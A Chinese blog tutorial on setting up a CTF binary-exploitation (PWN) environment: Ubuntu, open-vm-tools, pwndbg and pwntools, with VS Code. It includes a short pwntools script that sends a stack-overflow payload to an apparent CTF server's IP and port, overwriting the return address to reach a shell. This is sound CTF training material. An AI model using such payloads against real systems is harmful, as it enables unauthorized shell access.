欲想善其事必先利其器,无论是网络安全何种方向,都有自己经常用的工具环境,那么PWN也一样,拥有一个完善的工具环境,可以节约我们很多事,也不会在关键时候因为外在条件而卡壳,可谓逢山开山,逢水架桥,成为一个牛逼pwn手。
系统选择
系统选择肯定是Ubuntu了,毫无疑问,直接去linux官网下载,版本可选择近几年的,不要太老:
VMware Tools
安装虚拟机,那么VMware Tools是必不可少的,但是Vmware带的闭源版本不好装,而官方文档,也给出这一点:
所以我们选择安装Open-VM-Tools:
命令:sudo apt install open-vm-tools
sudo apt install open-vm-tools-desktop
随后重启,在登录界面选择选xorg,wayland没有剪贴板同步和文件拖拽,现在就可以实现和主机交互:
pwndbg
pwndbg是gdb一个插件,专门用来调试pwn题,新增如下功能:
| 命令 |
| arena |
| bins |
| Heapbase |
| heapinfo |
| Parseheap |
| tracemalloc |
| cylic |
| reabse |
| stack |
| retaddr |
| canary |
| got |
| plt |
| Hexdump |
安装命令:
apt install git
git clone GitHub - pwndbg/pwndbg: Exploit Development and Reverse Engineering with GDB Made Easy
随后进入pwndbg目录,运行setup.sh,开始安装:
安装成功之后,我们在终端输入gdb,显示pwndbg,就证明安装成功:
pwntools
pwntools是python的一个库,经常用来写脚本,安装命令如下:
apt install python3-pip
pip install pwntools
使用示例:
from pwn import *
io =remote('61.147.171.105',63315)
bin_sh = 0x400762
My_payload = (b'a'*0xA8+p64(bin_sh))
io.sendline(My_payload)
io.interactive()
Visual Studio Code
编写脚本建议使用Visual Studio Code,直接在商店中安装,在扩展搜索chinese,进行汉化:
932
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
